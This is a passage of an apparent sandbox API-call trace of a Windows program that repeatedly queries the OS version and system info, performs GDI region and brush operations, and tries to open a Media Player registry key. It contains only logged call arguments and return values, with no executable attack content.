hrgnSrc1=0xd30401d0, hrgnSrc2=0xd50401cd, iMode=1) returned 1 [0087.800] CombineRgn (hrgnDst=0x1040be0, hrgnSrc1=0xd30401d0, hrgnSrc2=0xd50401cd, iMode=4) returned 2 [0087.800] CreateSolidBrush (color=0xff) returned 0x2100bde [0087.800] CreateSolidBrush (color=0xff0000) returned 0x1100be1 [0087.800] DeleteObject (ho=0x1100be1) returned 1 [0087.800] DeleteObject (ho=0xd50401cd) returned 1 [0087.800] DeleteObject (ho=0xd30401d0) returned 1 [0087.800] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.800] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.800] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.800] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.800] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.801] BeginPath (hdc=0x0) returned 0 [0087.801] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.801] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.801] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.801] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.801] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.801] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.801] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.801] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd60401cd [0087.801] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd40401d0 [0087.801] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be2 [0087.801] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be3 [0087.801] CombineRgn (hrgnDst=0x1040be2, hrgnSrc1=0xd60401cd, hrgnSrc2=0xd40401d0, iMode=1) returned 1 [0087.801] CombineRgn (hrgnDst=0x1040be3, hrgnSrc1=0xd60401cd, hrgnSrc2=0xd40401d0, iMode=4) returned 2 [0087.801] CreateSolidBrush (color=0xff) returned 0x2100be1 [0087.801] CreateSolidBrush (color=0xff0000) returned 0x1100be4 [0087.801] DeleteObject (ho=0x1100be4) returned 1 [0087.801] DeleteObject (ho=0xd40401d0) returned 1 [0087.801] DeleteObject (ho=0xd60401cd) returned 1 [0087.801] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.801] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.801] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.801] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.801] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.801] BeginPath (hdc=0x0) returned 0 [0087.801] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.801] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.801] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.801] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.801] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.801] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.801] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.801] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.801] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd50401d0 [0087.801] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd70401cd [0087.801] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be5 [0087.801] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be6 [0087.801] CombineRgn (hrgnDst=0x1040be5, hrgnSrc1=0xd50401d0, hrgnSrc2=0xd70401cd, iMode=1) returned 1 [0087.802] CombineRgn (hrgnDst=0x1040be6, hrgnSrc1=0xd50401d0, hrgnSrc2=0xd70401cd, iMode=4) returned 2 [0087.802] CreateSolidBrush (color=0xff) returned 0x2100be4 [0087.802] CreateSolidBrush (color=0xff0000) returned 0x1100be7 [0087.802] DeleteObject (ho=0x1100be7) returned 1 [0087.802] DeleteObject (ho=0xd70401cd) returned 1 [0087.802] DeleteObject (ho=0xd50401d0) returned 1 [0087.802] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.802] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.802] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.802] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.802] BeginPath (hdc=0x0) returned 0 [0087.802] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.802] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.802] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.802] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.802] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.802] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.802] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.802] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd80401cd [0087.802] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd60401d0 [0087.802] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be8 [0087.802] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040be9 [0087.802] CombineRgn (hrgnDst=0x1040be8, hrgnSrc1=0xd80401cd, hrgnSrc2=0xd60401d0, iMode=1) returned 1 [0087.802] CombineRgn (hrgnDst=0x1040be9, hrgnSrc1=0xd80401cd, hrgnSrc2=0xd60401d0, iMode=4) returned 2 [0087.802] CreateSolidBrush (color=0xff) returned 0x2100be7 [0087.802] CreateSolidBrush (color=0xff0000) returned 0x1100bea [0087.802] DeleteObject (ho=0x1100bea) returned 1 [0087.802] DeleteObject (ho=0xd60401d0) returned 1 [0087.802] DeleteObject (ho=0xd80401cd) returned 1 [0087.802] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.802] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.802] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.802] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.802] BeginPath (hdc=0x0) returned 0 [0087.802] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.802] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.802] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.802] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.802] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.803] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.803] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.803] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd70401d0 [0087.803] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd90401cd [0087.803] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040beb [0087.803] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bec [0087.803] CombineRgn (hrgnDst=0x1040beb, hrgnSrc1=0xd70401d0, hrgnSrc2=0xd90401cd, iMode=1) returned 1 [0087.803] CombineRgn (hrgnDst=0x1040bec, hrgnSrc1=0xd70401d0, hrgnSrc2=0xd90401cd, iMode=4) returned 2 [0087.803] CreateSolidBrush (color=0xff) returned 0x2100bea [0087.803] CreateSolidBrush (color=0xff0000) returned 0x1100bed [0087.803] DeleteObject (ho=0x1100bed) returned 1 [0087.803] DeleteObject (ho=0xd90401cd) returned 1 [0087.803] DeleteObject (ho=0xd70401d0) returned 1 [0087.803] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.803] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.803] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.803] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.803] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.803] BeginPath (hdc=0x0) returned 0 [0087.803] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.803] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.803] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.803] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.803] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.803] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.803] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.803] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.803] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda0401cd [0087.803] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd80401d0 [0087.803] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bee [0087.803] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bef [0087.803] CombineRgn (hrgnDst=0x1040bee, hrgnSrc1=0xda0401cd, hrgnSrc2=0xd80401d0, iMode=1) returned 1 [0087.803] CombineRgn (hrgnDst=0x1040bef, hrgnSrc1=0xda0401cd, hrgnSrc2=0xd80401d0, iMode=4) returned 2 [0087.803] CreateSolidBrush (color=0xff) returned 0x2100bed [0087.803] CreateSolidBrush (color=0xff0000) returned 0x1100bf0 [0087.803] DeleteObject (ho=0x1100bf0) returned 1 [0087.804] DeleteObject (ho=0xd80401d0) returned 1 [0087.804] DeleteObject (ho=0xda0401cd) returned 1 [0087.804] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.804] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.804] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.804] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.804] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.804] BeginPath (hdc=0x0) returned 0 [0087.804] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.804] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.804] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.804] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.804] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.804] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.804] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.804] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd90401d0 [0087.804] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb0401cd [0087.804] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf1 [0087.804] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf2 [0087.804] CombineRgn (hrgnDst=0x1040bf1, hrgnSrc1=0xd90401d0, hrgnSrc2=0xdb0401cd, iMode=1) returned 1 [0087.804] CombineRgn (hrgnDst=0x1040bf2, hrgnSrc1=0xd90401d0, hrgnSrc2=0xdb0401cd, iMode=4) returned 2 [0087.804] CreateSolidBrush (color=0xff) returned 0x2100bf0 [0087.804] CreateSolidBrush (color=0xff0000) returned 0x1100bf3 [0087.804] DeleteObject (ho=0x1100bf3) returned 1 [0087.804] DeleteObject (ho=0xdb0401cd) returned 1 [0087.804] DeleteObject (ho=0xd90401d0) returned 1 [0087.804] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.804] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.804] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.804] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.804] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.804] BeginPath (hdc=0x0) returned 0 [0087.804] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.804] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.804] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.804] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.804] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.804] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.804] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.804] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.805] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc0401cd [0087.805] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xda0401d0 [0087.805] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf4 [0087.805] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf5 [0087.805] CombineRgn (hrgnDst=0x1040bf4, hrgnSrc1=0xdc0401cd, hrgnSrc2=0xda0401d0, iMode=1) returned 1 [0087.805] CombineRgn (hrgnDst=0x1040bf5, hrgnSrc1=0xdc0401cd, hrgnSrc2=0xda0401d0, iMode=4) returned 2 [0087.805] CreateSolidBrush (color=0xff) returned 0x2100bf3 [0087.805] CreateSolidBrush (color=0xff0000) returned 0x1100bf6 [0087.805] DeleteObject (ho=0x1100bf6) returned 1 [0087.805] DeleteObject (ho=0xda0401d0) returned 1 [0087.805] DeleteObject (ho=0xdc0401cd) returned 1 [0087.805] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.805] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.805] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.805] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.805] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.805] BeginPath (hdc=0x0) returned 0 [0087.805] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.805] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.805] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.805] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.805] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.805] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.805] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.805] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.805] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdb0401d0 [0087.805] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdd0401cd [0087.805] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf7 [0087.805] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bf8 [0087.805] CombineRgn (hrgnDst=0x1040bf7, hrgnSrc1=0xdb0401d0, hrgnSrc2=0xdd0401cd, iMode=1) returned 1 [0087.805] CombineRgn (hrgnDst=0x1040bf8, hrgnSrc1=0xdb0401d0, hrgnSrc2=0xdd0401cd, iMode=4) returned 2 [0087.805] CreateSolidBrush (color=0xff) returned 0x2100bf6 [0087.805] CreateSolidBrush (color=0xff0000) returned 0x1100bf9 [0087.805] DeleteObject (ho=0x1100bf9) returned 1 [0087.805] DeleteObject (ho=0xdd0401cd) returned 1 [0087.805] DeleteObject (ho=0xdb0401d0) returned 1 [0087.805] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.805] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.806] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.806] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.806] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.806] BeginPath (hdc=0x0) returned 0 [0087.806] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.806] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.806] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.806] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.806] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.806] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.806] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.806] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.806] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xde0401cd [0087.806] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdc0401d0 [0087.806] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfa [0087.806] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040bfb [0087.806] CombineRgn (hrgnDst=0x1040bfa, hrgnSrc1=0xde0401cd, hrgnSrc2=0xdc0401d0, iMode=1) returned 1 [0087.806] CombineRgn (hrgnDst=0x1040bfb, hrgnSrc1=0xde0401cd, hrgnSrc2=0xdc0401d0, iMode=4) returned 2 [0087.806] CreateSolidBrush (color=0xff) returned 0x2100bf9 [0087.806] CreateSolidBrush (color=0xff0000) returned 0x1100bfc [0087.806] DeleteObject (ho=0x1100bfc) returned 1 [0087.806] DeleteObject (ho=0xdc0401d0) returned 1 [0087.806] DeleteObject (ho=0xde0401cd) returned 1 [0087.806] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.806] GetSystemInfo (in: 